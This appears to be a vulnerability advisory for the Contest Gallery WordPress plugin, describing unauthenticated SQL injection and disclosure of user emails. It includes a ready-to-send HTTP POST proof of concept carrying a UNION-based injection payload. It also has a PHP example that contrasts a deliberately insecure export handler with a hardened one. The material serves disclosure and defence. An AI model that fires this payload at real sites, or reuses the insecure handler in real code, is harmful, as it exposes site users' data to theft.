wpexploit | Tyler Miller | WPEX-ID: 45EE86A7-1497-4C81-98B8-9A8E5B3D4FAC
History: Nov 01, 2021 - 12:00 a.m.

Contest Gallery < 13.1.0.6 - Missing Access Controls to Unauthenticated SQL injection / Email Address Disclosure


EPSS: 0.397 (Low), Percentile: 97.3%

The plugin does not perform capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery. This allows unauthenticated attackers to perform SQL injection attacks and to obtain the list of all users registered on the blog, including their usernames and email addresses.

POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 318
Connection: close
Upgrade-Insecure-Requests: 1

cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true
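The two controls the advisory says are missing, shown as an added PHP example that is not the plugin's own code: a capability check before the export runs, and a parameterised query for the cg-search-user-name-original value. The function names, the nonce action name and the capability used are assumptions.

```php
<?php
// Added illustration (hypothetical WordPress export handler, not Contest Gallery's code).
// It contrasts the pattern the advisory describes with a hardened equivalent.

// Insecure pattern as described in the advisory (do not use): no capability check,
// and the search value is interpolated straight into the SQL statement.
function cg_export_users_insecure() {
    global $wpdb;
    $name = $_POST['cg-search-user-name-original'];
    $sql  = "SELECT user_login, user_email FROM {$wpdb->users} WHERE user_login LIKE '%{$name}%'";
    return $wpdb->get_results( $sql, ARRAY_A ); // request sender controls the statement
}

// Hardened version: only an administrator with a valid nonce reaches the query,
// and the search term is bound through $wpdb->prepare() rather than concatenated.
function cg_export_users_secure() {
    global $wpdb;

    // 1. Capability check: exporting registered users is an admin-only operation.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }

    // 2. CSRF protection: the export form must carry a nonce (action name assumed).
    check_admin_referer( 'cg_export_users' );

    // 3. Normalise the input before it goes anywhere near SQL.
    $name = isset( $_POST['cg-search-user-name-original'] )
        ? sanitize_text_field( wp_unslash( $_POST['cg-search-user-name-original'] ) )
        : '';
    if ( strlen( $name ) > 60 ) {
        $name = substr( $name, 0, 60 ); // user_login is capped at 60 characters
    }

    // 4. Parameterised query: the value is bound as a string, so quotes and UNION
    //    clauses stay data; esc_like() stops user-supplied wildcards widening the match.
    $pattern = '%' . $wpdb->esc_like( $name ) . '%';
    $sql     = $wpdb->prepare(
        "SELECT user_login, user_email FROM {$wpdb->users} WHERE user_login LIKE %s LIMIT 500",
        $pattern
    );
    return $wpdb->get_results( $sql, ARRAY_A );
}
```

With the hardened handler, the unauthenticated request shown above is rejected at the capability check, and even an authenticated administrator sending the same payload gets it treated as a literal search string.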

